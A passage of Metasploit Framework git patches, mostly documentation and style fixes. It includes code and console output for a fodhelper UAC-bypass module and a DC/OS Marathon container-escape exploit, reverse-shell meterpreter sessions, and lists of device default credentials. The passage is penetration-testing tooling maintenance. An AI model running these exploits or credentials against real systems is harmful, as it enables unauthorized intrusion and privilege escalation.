x86 + 1 Windows x64 + + +msf exploit(bypassuac_fodhelper) > set target 0 +target => 0 +msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(bypassuac_fodhelper) > run + +[*] Started reverse TCP handler on 192.168.50.1:4445 +[*] UAC is Enabled, checking level... +[+] Part of Administrators group! Continuing... +[+] UAC is set to Default +[+] BypassUAC can bypass this setting, continuing... +[*] Configuring payload and stager registry keys ... +[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe +[*] Sending stage (957487 bytes) to 192.168.50.4 +[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100 +[*] Cleaining up registry keys ... + +meterpreter > shell +Process 4076 created. +Channel 1 created. +Microsoft Windows [Version 10.0.14393] +(c) 2016 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label" +whoami /all | findstr /C:"Mandatory Label" +ERROR: Unable to get user claims information. +Mandatory Label\High Mandatory Level Label S-1-16-12288 + +C:\WINDOWS\system32> + +``` From 93bb47d54693edfbb5f2df031f169e4b1a87741a Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 19:27:15 +0100 Subject: [PATCH 10/38] msftidy fix --- .../windows/local/bypassuac_fodhelper.md | 1 - .../windows/local/bypassuac_fodhelper.rb | 24 +++++++++---------- 2 files changed, 12 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md index d84a7cc89a..2017cbc7eb 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md +++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md @@ -20,7 +20,6 @@ ##Scenario - ``` msf > [*] Sending stage (1189423 bytes) to 192.168.50.4 diff --git a/modules/exploits/windows/local/bypassuac_fodhelper.rb b/modules/exploits/windows/local/bypassuac_fodhelper.rb index b5f46e2ade..8eac5c5949 100644 --- a/modules/exploits/windows/local/bypassuac_fodhelper.rb +++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb @@ -78,11 +78,11 @@ class MetasploitModule < Msf::Exploit::Local if session.arch == ARCH_X86 # fodhelper.exe is x64 only exe commspec = '%WINDIR%\\Sysnative\\cmd.exe' - if target_arch.first == ARCH_X64 - # We can't use absolute path here as - # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session - psh_path = "powershell.exe" - end + if target_arch.first == ARCH_X64 + # We can't use absolute path here as + # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session + psh_path = "powershell.exe" + end end if target_arch.first == ARCH_X86 # Invoking x86, so switch to SysWOW64 @@ -95,10 +95,10 @@ class MetasploitModule < Msf::Exploit::Local end end - if !payload.arch.empty? && !(payload.arch.first == target_arch.first) - fail_with(Failure::BadConfig, 'payload and target should use the same architecture') - end - + if !payload.arch.empty? && !(payload.arch.first == target_arch.first) + fail_with(Failure::BadConfig, 'payload and target should use the same architecture') + end + # Validate that we can actually do things before we bother # doing any more work check_permissions! @@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) - + if psh_payload.length > CMD_MAX_LEN fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") end @@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local end registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) - registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, payload_value,psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) @@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Local if existing.empty? registry_deletekey(FODHELPER_DEL_KEY, registry_view) else - registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) + registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) From 2fbbc98b5d2a47e57a5da33592b9ca8f932e87ae Mon Sep 17 00:00:00 2001 From: amaloteaux Date: Mon, 22 May 2017 19:50:40 +0100 Subject: [PATCH 11/38] document little trick for those who read :) --- .../modules/exploit/windows/local/bypassuac_fodhelper.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md index 2017cbc7eb..95e24cbfba 100644 --- a/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md +++ b/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md @@ -15,7 +15,10 @@ ## Usage You'll first need to obtain a session on the target system. - Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. + Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. + The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system. + On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (`set DISABLEPAYLOADHANDLER true`) + and manually create a job handler corresponding to the payload. ##Scenario From bac23757a4c8a863c201229d1e1806b49926810a Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Tue, 30 May 2017 09:33:03 -0400 Subject: [PATCH 12/38] Updated based on busterb comments --- .../exploit/linux/http/dcos_marathon.md | 40 +++++++++---------- modules/exploits/linux/http/dcos_marathon.rb | 10 +---- 2 files changed, 22 insertions(+), 28 deletions(-) diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md index fcf52aa50f..b215fe0556 100644 --- a/documentation/modules/exploit/linux/http/dcos_marathon.md +++ b/documentation/modules/exploit/linux/http/dcos_marathon.md @@ -2,36 +2,36 @@ Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. -As the docker container excutes command as uid 0 it is honored +As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. -*Notes: The docker image must be a valid docker image from +*Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS ## DCOS -This Expoit was tested with CentOS 7 as the host operating system for +This Exploit was tested with CentOS 7 as the host operating system for the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with -Defualt 'custom' installation for on site premise setup. Only the Install +Default 'custom' installation for on site premise setup. Only the Install part of the DCOS guide was completed, the system hardening and securing -your cluster section where skipped. This is to represent a 'Defualt' install +your cluster section where skipped. This is to represent a 'Default' install with a system admin conducting hasty deployments taking no thought about security. ## To Setup Your Cluster -I recommend doing a 'On-Premies'/custom +I recommend doing a 'on-premise'/custom cluster. https://dcos.io/docs/1.8/administration/installing/custom/ Create a virtual CentOS machine, install requirements base on the above guide. - + ```bash # The TLDR from the above guide sudo systemctl stop firewalld && sudo systemctl disable firewalld sudo yum install -y tar xz unzip curl ipset ntp -systemctl start ntpd -systemctl enable ntpd +sudo systemctl start ntpd +sudo systemctl enable ntpd sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \ sudo groupadd nogroup && sudo reboot ``` @@ -60,7 +60,7 @@ Once the CentOS machine has rebooted, edit the systemctl service file for docker and change the ExecStart- line to `ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://` restart the docker service and verify it is running. -lastely generate ssh rsa keys for authentication. And update the +lastly generate ssh rsa keys for authentication. And update the /etc/ssh/sshd_config file to support root login. ```bash @@ -77,10 +77,10 @@ Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. Login and get their current IP address. * Note: I recommend giving them static IPs if you have further use for the cluster. -From here use another linux machine with docker installed to finish -the installation process. I used an ubuntu machine with docker installed. +From here use another Linux machine with docker installed to finish +the installation process. I used an Ubuntu machine with docker installed. -Follow the custom CLI guide for creating the required files in +Follow the custom CLI guide for creating the required files in the genconf folder. https://dcos.io/docs/1.8/administration/installing/custom/cli/ @@ -137,9 +137,9 @@ If all is passing navigate to http://[master_ip]:8080/ You should see the Marathon UI web application. # Exploitation -This module is designed for the attacker to leaverage the creatation of a -docker contianer with out authentication through the DCOS Marathon UI -to gain root access to the hosting server of the docker container +This module is designed for the attacker to leverage, creation of a +docker container with out authentication through the DCOS Marathon UI +to gain root access to the hosting server of the docker container in the DCOS cluster. ## Options @@ -157,7 +157,7 @@ in the DCOS cluster. ## Example Output ``` -msf > use exploit/linux/http/dcos_marathon +msf > use exploit/linux/http/dcos_marathon msf exploit(dcos_marathon) > set RHOST 192.168.0.9 RHOST => 192.168.0.9 msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp @@ -168,9 +168,9 @@ msf exploit(dcos_marathon) > set verbose true verbose => true msf exploit(dcos_marathon) > check [*] 192.168.0.9:8080 The target appears to be vulnerable. -msf exploit(dcos_marathon) > exploit +msf exploit(dcos_marathon) > exploit -[*] Started reverse TCP handler on 192.168.0.100:4444 +[*] Started reverse TCP handler on 192.168.0.100:4444 [*] Setting container json request variables [*] Creating the docker container command [*] The docker container is created, waiting for it to deploy @@ -188,5 +188,5 @@ OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UT Architecture : x64 System Language : en_US Meterpreter : python/linux -meterpreter > +meterpreter > ``` diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index dd7168532a..78e0915c85 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. - As the docker container excutes command as uid 0 it is honored + As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. @@ -32,10 +30,6 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'], ], - 'Payload' => - { - 'DisableNops'=> true, - }, 'Targets' => [ [ 'Python', { 'Platform' => 'python', @@ -58,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]), OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']), - OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ]) + OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]) ], self.class) end From 9c93aae412427475a2d7efbb095f22faefedcae0 Mon Sep 17 00:00:00 2001 From: wolfthefallen Date: Tue, 30 May 2017 10:07:07 -0400 Subject: [PATCH 13/38] Removed self.class from register --- modules/exploits/linux/http/dcos_marathon.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb index 78e0915c85..0d458db61a 100644 --- a/modules/exploits/linux/http/dcos_marathon.rb +++ b/modules/exploits/linux/http/dcos_marathon.rb @@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']), OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]) - ], self.class) + ]) end def get_apps From 1c23be91a70757a6a09aa6f7fad7b8cce3af64e6 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 31 May 2017 21:21:38 -0400 Subject: [PATCH 14/38] sample output to scenarios conversion in docs --- .../admin/chromecast/chromecast_youtube.md | 4 ++-- .../auxiliary/admin/http/scadabr_credential_dump.md | 2 +- .../admin/http/zabbix_ldap_password_extractor.md | 0 .../modules/auxiliary/gather/censys_search.md | 4 ++-- .../modules/auxiliary/scanner/ftp/anonymous.md | 4 ++-- .../modules/auxiliary/scanner/ftp/ftp_login.md | 3 ++- .../modules/auxiliary/scanner/ftp/ftp_version.md | 4 ++-- .../scanner/http/binom3_login_config_pass_dump.md | 13 +++++++++++-- .../auxiliary/scanner/http/chromecast_webserver.md | 4 ++-- .../auxiliary/scanner/http/chromecast_wifi.md | 4 ++-- .../modules/auxiliary/scanner/http/crawler.md | 3 ++- .../auxiliary/scanner/http/epmp1000_cmd_exec.md | 9 +++++++-- .../auxiliary/scanner/http/epmp1000_dump_config.md | 5 +++-- .../auxiliary/scanner/http/epmp1000_dump_hashes.md | 9 +++++++-- .../auxiliary/scanner/http/epmp1000_web_login.md | 5 +++-- .../auxiliary/scanner/http/gavazzi_em_login_loot.md | 12 +++++++----- .../http/meteocontrol_weblog_extractadmin.md | 5 +++-- .../scanner/http/ms15_034_http_sys_memory_dump.md | 3 ++- .../modules/auxiliary/scanner/http/owa_ews_login.md | 5 +++-- .../modules/auxiliary/scanner/http/robots_txt.md | 3 ++- .../scanner/ike/cisco_ike_benigncertain.md | 2 +- .../auxiliary/scanner/snmp/cambium_snmp_loot.md | 8 +++++--- .../multi/browser/adobe_flash_hacking_team_uaf.md | 2 +- .../modules/exploit/multi/http/axis2_deployer.md | 4 +--- .../exploit/multi/http/glassfish_deployer.md | 2 +- .../exploit/multi/http/mediawiki_syntaxhighlight.md | 5 +++-- .../multi/http/rails_web_console_v2_code_exec.md | 7 +++---- .../windows/http/manageengine_connectionid_write.md | 5 +++-- .../windows/http/serviio_checkstreamurl_cmd_exec.md | 2 +- .../exploit/windows/iis/iis_webdav_upload_asp.md | 2 +- 30 files changed, 85 insertions(+), 55 deletions(-) create mode 100644 documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md diff --git a/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md b/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md index b52fa70223..0c31240ea7 100644 --- a/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md +++ b/documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md @@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module. The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo) -## Sample Output +## Scenarios -Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular) +### 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > auxiliary/admin/chromecast/chromecast_youtube diff --git a/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md b/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md index db767d338b..0ad574b540 100644 --- a/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md +++ b/documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md @@ -27,7 +27,7 @@ 7. You should get credentials -## Sample Output +## Scenarios ``` [+] 172.16.191.166:8080 Authenticated successfully as 'admin' diff --git a/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md b/documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/documentation/modules/auxiliary/gather/censys_search.md b/documentation/modules/auxiliary/gather/censys_search.md index fb243e2805..92ea6fe952 100644 --- a/documentation/modules/auxiliary/gather/censys_search.md +++ b/documentation/modules/auxiliary/gather/censys_search.md @@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we 5: Do: `set CENSYS_DORK rapid7` 6: Do: `run` -## Sample Output +## Scenarios -#### Certificates Search +### Certificates Search ``` msf auxiliary(censys_search) > set CENSYS_DORK rapid7 diff --git a/documentation/modules/auxiliary/scanner/ftp/anonymous.md b/documentation/modules/auxiliary/scanner/ftp/anonymous.md index dbb0f5b27d..f36a25ff6c 100644 --- a/documentation/modules/auxiliary/scanner/ftp/anonymous.md +++ b/documentation/modules/auxiliary/scanner/ftp/anonymous.md @@ -57,9 +57,9 @@ This module allows us to scan through a series of IP Addresses and provide detai 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios -### On vsFTPd 3.0.3 on Kali +### vsFTPd 3.0.3 on Kali ``` msf > use auxiliary/scanner/ftp/anonymous diff --git a/documentation/modules/auxiliary/scanner/ftp/ftp_login.md b/documentation/modules/auxiliary/scanner/ftp/ftp_login.md index 9d6c7a671d..f9eadd3a64 100644 --- a/documentation/modules/auxiliary/scanner/ftp/ftp_login.md +++ b/documentation/modules/auxiliary/scanner/ftp/ftp_login.md @@ -47,7 +47,8 @@ This module will test FTP logins on a range of machines and report successful lo 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios + ``` msf> use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org diff --git a/documentation/modules/auxiliary/scanner/ftp/ftp_version.md b/documentation/modules/auxiliary/scanner/ftp/ftp_version.md index 86e9b01cae..60347345d4 100644 --- a/documentation/modules/auxiliary/scanner/ftp/ftp_version.md +++ b/documentation/modules/auxiliary/scanner/ftp/ftp_version.md @@ -47,9 +47,9 @@ This module allows us to scan through a series of IP Addresses and provide detai 3. Do: ```set RPORT [IP]``` 4. Do: ```run``` -## Sample Output +## Scenarios -### On vsFTPd 3.0.3 on Kali +### vsFTPd 3.0.3 on Kali ``` msf > use auxiliary/scanner/ftp/ftp_version diff --git a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md index cdfc0f1acb..727e28d2f4 100644 --- a/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md +++ b/documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md @@ -1,4 +1,13 @@ -This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found. +This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. +There are four (4) default accounts: + +1. root/root +2. admin/1 +3. alg/1 +4. user/1 + +In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. +The module attempts to download configuration and password files depending on the login user credentials found. ## Verification Steps @@ -7,7 +16,7 @@ This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Qual 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/binom3_login_config_pass_dump diff --git a/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md b/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md index 49801c5f45..dbc813c245 100644 --- a/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md +++ b/documentation/modules/auxiliary/scanner/http/chromecast_webserver.md @@ -6,9 +6,9 @@ This module is a scanner which enumerates Google Chromecast via its HTTP interfa 2. Do: ```set RHOSTS [IP]``` 3. Do: ```run``` -## Sample Output +## Scenarios -Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) +### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > use auxiliary/scanner/http/chromecast_webserver diff --git a/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md b/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md index b9e2e88091..44584372fd 100644 --- a/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md +++ b/documentation/modules/auxiliary/scanner/http/chromecast_wifi.md @@ -6,9 +6,9 @@ This module is a scanner which enumerates WiFi access points visible from a Goog 2. Do: ```set RHOSTS [IP]``` 3. Do: ```run``` -## Sample Output +## Scenarios -Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) +### All 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular) ``` msf > use auxiliary/scanner/http/chromecast_wifi diff --git a/documentation/modules/auxiliary/scanner/http/crawler.md b/documentation/modules/auxiliary/scanner/http/crawler.md index 0dedb947c3..3ef998b739 100644 --- a/documentation/modules/auxiliary/scanner/http/crawler.md +++ b/documentation/modules/auxiliary/scanner/http/crawler.md @@ -34,9 +34,10 @@ You can use any web application to test the crawler. 4. Do: ```set URI [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### Example against [WebGoat](https://github.com/WebGoat/WebGoat) + ``` msf> use auxiliary/scanner/http/crawler msf auxiliary(crawler) > set RHOST 127.0.0.1 diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md b/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md index 1bd59c1165..7349610721 100755 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md @@ -1,4 +1,9 @@ -This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 ( use auxiliary/scanner/http/epmp1000_cmd_exec diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md index a10082cce2..c7a42c8a69 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_config.md @@ -1,4 +1,5 @@ -This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. +This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box has four (4) login accounts - admin/admin, installer/installer, home/home, and readonly/readonly. +This module requires any one of the following login credentials - admin / installer / home - to dump device configuration file. ## Verification Steps @@ -7,7 +8,7 @@ This module dumps Cambium ePMP 1000 device configuration file. An ePMP 1000 box 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/epmp1000_dump_config diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md index 6ff25406ec..cb1a7cdc5f 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md @@ -1,4 +1,9 @@ -This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 ( use auxiliary/scanner/http/epmp1000_dump_hashes diff --git a/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md b/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md index 8c90ba0351..34271d7913 100644 --- a/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md +++ b/documentation/modules/auxiliary/scanner/http/epmp1000_web_login.md @@ -1,4 +1,5 @@ -This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. +This module scans for Cambium ePMP 1000 management login portal(s), and attempts to identify valid credentials. +Default login credentials are - admin/admin, installer/installer, home/home and readonly/readonly. ## Verification Steps @@ -7,7 +8,7 @@ This module scans for Cambium ePMP 1000 management login portal(s), and attempts 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/epmp1000_web_login diff --git a/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md b/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md index 357b0fb84d..b6a63b1c8c 100644 --- a/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md +++ b/documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md @@ -1,11 +1,13 @@ -This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. +This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. +A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. -The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. +The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. +This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include: -VMU-C EM prior to firmware Version A11_U05 -VMU-C PV prior to firmware Version A17. +* VMU-C EM prior to firmware Version A11_U05 +* VMU-C PV prior to firmware Version A17. ## Verification Steps @@ -14,7 +16,7 @@ VMU-C PV prior to firmware Version A17. 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/gavazzi_em_login_loot diff --git a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md index a1eba6a6c9..904c63465a 100644 --- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md +++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md @@ -1,4 +1,5 @@ -Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. +Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. +The module exploits this vulnerability to remotely extract Administrator password for the device management portal. Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. @@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin diff --git a/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md b/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md index 2a525fb316..b7fbd69b40 100755 --- a/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md +++ b/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md @@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios + ``` msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125 diff --git a/documentation/modules/auxiliary/scanner/http/owa_ews_login.md b/documentation/modules/auxiliary/scanner/http/owa_ews_login.md index 383fede571..5c4e71880e 100644 --- a/documentation/modules/auxiliary/scanner/http/owa_ews_login.md +++ b/documentation/modules/auxiliary/scanner/http/owa_ews_login.md @@ -1,4 +1,5 @@ -This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method. +This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. +It is typically faster than the traditional form-based OWA login method. ## Verification Steps @@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos 3. Set TARGETURI if necessary. 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf auxiliary(owa_ews_login) > run diff --git a/documentation/modules/auxiliary/scanner/http/robots_txt.md b/documentation/modules/auxiliary/scanner/http/robots_txt.md index 4161a04914..f830e1b696 100644 --- a/documentation/modules/auxiliary/scanner/http/robots_txt.md +++ b/documentation/modules/auxiliary/scanner/http/robots_txt.md @@ -25,7 +25,8 @@ is extremely common. You can set the test path where the scanner will try to find `robots.txt` file. Default is `/` -## Sample Output +## Scenarios + ``` msf> use auxiliary/scanner/http/robots_txt msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238 diff --git a/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md b/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md index 1c5101c640..c8943fdc43 100644 --- a/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md +++ b/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md @@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf auxiliary(cisco_ike_benigncertain) > show options diff --git a/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md b/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md index 33cc276ae5..313c4e82d9 100644 --- a/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md +++ 